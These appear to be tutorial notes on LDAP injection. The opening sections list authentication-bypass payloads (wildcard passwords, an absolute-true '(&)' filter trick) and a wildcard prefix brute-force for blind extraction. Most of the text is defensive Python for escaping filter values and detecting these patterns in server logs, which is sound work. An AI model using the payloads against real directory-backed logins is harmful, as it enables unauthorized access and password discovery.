Auth bypass

If we know a username, we can put * in the password field, which results in a query like this:

(&(uid=admin)(userPassword=*))

If we don't have any username, we put * in both fields, which results in this query:

(&(uid=*)(userPassword=*))

If we cannot use a wildcard but know a username, we can try admin)(|(& in the username field and abc) in the password field. This wraps the password check in an OR (|) together with (&), the empty AND filter, which is always true (RFC 4526 calls it the absolute true filter), so the password clause no longer matters:

(&(uid=admin)(|(&)(userPassword=abc)))
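The three bypasses above work only because user input is concatenated straight into the filter string. As an added example (not code from the original notes), the following Python shows the vulnerable concatenation next to a version that hex-escapes the RFC 4515 metacharacters before building the filter; `escape_filter_value` and `build_login_filter` are assumed helper names, and the page's own payloads are used as input to show they become literal values rather than filter syntax.

```python
# Added example: escaping user-supplied values per RFC 4515 before they are
# placed inside an LDAP search filter. Function names are assumed, not from
# any particular library.

# Characters that carry meaning inside a filter assertion value (RFC 4515 section 3).
_LDAP_ESCAPES = {
    "\\": r"\5c",    # backslash
    "*": r"\2a",     # wildcard
    "(": r"\28",     # open paren
    ")": r"\29",     # close paren
    "\x00": r"\00",  # NUL
}


def escape_filter_value(value: str) -> str:
    """Return value with every LDAP filter metacharacter hex-escaped.

    Escaping is done character by character, so the backslash mapping never
    double-escapes output produced for another character.
    """
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_unsafe(username: str, password: str) -> str:
    """The vulnerable pattern from the notes: raw string concatenation."""
    return f"(&(uid={username})(userPassword={password}))"


def build_login_filter(username: str, password: str) -> str:
    """Same filter shape, but both values are escaped so they cannot add or
    close filter components."""
    return (
        f"(&(uid={escape_filter_value(username)})"
        f"(userPassword={escape_filter_value(password)}))"
    )


def filter_component_count(filt: str) -> int:
    """Count unescaped '(' in a filter; a login filter built from two
    values should always have exactly three, whatever the input was."""
    count = 0
    i = 0
    while i < len(filt):
        if filt[i] == "\\":
            i += 3  # skip a \XX escape sequence
            continue
        if filt[i] == "(":
            count += 1
        i += 1
    return count


if __name__ == "__main__":
    for user, pw in [("admin", "*"), ("*", "*"), ("admin)(|(&", "abc)")]:
        print("unsafe :", build_login_filter_unsafe(user, pw))
        print("escaped:", build_login_filter(user, pw))
```

Escaping keeps the filter's structure fixed, but the larger design fix is not to compare `userPassword` in a search filter at all: look up the user's DN with an escaped `uid` search, then verify the password with an LDAP bind as that DN, which leaves no password value in any filter.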

Data Exfiltration

Inputting a bare wildcard * matches every value of the attribute, so the query returns all entries.

If the injection is blind, the value can be brute-forced one character at a time with a wildcard suffix, checking whether each prefix produces a match:

a*
b*
c*
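Both the bare wildcard and the one-character-at-a-time brute force leave a recognisable trail in the directory server's search log: many searches from one connection whose assertion values differ only in a growing literal prefix before `*`. As an added example (not from the original notes), the Python below parses constructed OpenLDAP-style `stats` log lines, flags wildcards against `userPassword` and the `(&)` absolute-true filter from the bypass section, and reports a connection that issues several distinct wildcard prefixes against the same attribute. The log lines, the threshold and the function names are all assumptions.

```python
# Added example: detecting wildcard enumeration and absolute-true filters in
# LDAP search logs. Log lines are constructed for this example and follow the
# general shape of OpenLDAP "stats" logging; they are not real data.
import re
from collections import defaultdict

SAMPLE_LOG = """\
conn=1001 op=1 SRCH base="dc=example,dc=com" scope=2 deref=0 filter="(&(uid=admin)(userPassword=a*))"
conn=1001 op=2 SRCH base="dc=example,dc=com" scope=2 deref=0 filter="(&(uid=admin)(userPassword=b*))"
conn=1001 op=3 SRCH base="dc=example,dc=com" scope=2 deref=0 filter="(&(uid=admin)(userPassword=c*))"
conn=1001 op=4 SRCH base="dc=example,dc=com" scope=2 deref=0 filter="(&(uid=admin)(userPassword=ca*))"
conn=1002 op=1 SRCH base="dc=example,dc=com" scope=2 deref=0 filter="(&(uid=jdoe)(userPassword=s3cret))"
conn=1003 op=1 SRCH base="dc=example,dc=com" scope=2 deref=0 filter="(&(uid=admin)(|(&)(userPassword=abc)))"
conn=1004 op=1 SRCH base="dc=example,dc=com" scope=2 deref=0 filter="(&(uid=*)(userPassword=*))"
"""

# Pull the connection id and the filter string out of one log line.
LOG_RE = re.compile(r'conn=(\d+) .*?filter="([^"]*)"')
# Match one simple assertion "(attr=value)" inside a filter; values containing
# parentheses are already escaped in a well-formed filter, so [^()] is safe.
ASSERTION_RE = re.compile(r"\(([A-Za-z][\w.;-]*)=([^()]*)\)")


def parse_line(line: str):
    """Return (conn, filter) for a search line, or None for anything else."""
    m = LOG_RE.search(line)
    return (m.group(1), m.group(2)) if m else None


def analyse(log_text: str, enumeration_threshold: int = 3):
    """Return a list of (conn, reason) findings for the given log text."""
    prefixes = defaultdict(set)  # (conn, attribute) -> literal prefixes seen before '*'
    findings = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        conn, filt = parsed
        # "(&)" is the absolute-true filter; it has no place in a login query.
        if "(&)" in filt:
            findings.append((conn, "absolute-true filter present: " + filt))
        for attr, value in ASSERTION_RE.findall(filt):
            # A password should never be searched for, least of all with a wildcard.
            if attr.lower() == "userpassword" and "*" in value:
                findings.append((conn, "wildcard against userPassword: " + filt))
            # Record "abc*"-style values; a bare "*" carries no prefix to enumerate.
            if value.endswith("*") and len(value) > 1:
                prefixes[(conn, attr)].add(value[:-1])
    for (conn, attr), seen in prefixes.items():
        if len(seen) >= enumeration_threshold:
            findings.append((conn, f"{len(seen)} distinct wildcard prefixes on {attr}"))
    return findings


if __name__ == "__main__":
    for conn, reason in analyse(SAMPLE_LOG):
        print(f"conn={conn}: {reason}")
```

The per-connection prefix count is the signal worth alerting on: a legitimate typeahead search also sends `jo*`, `joh*`, but against a display attribute, not `userPassword`, and an application that binds to verify passwords never generates a `userPassword=` assertion at all.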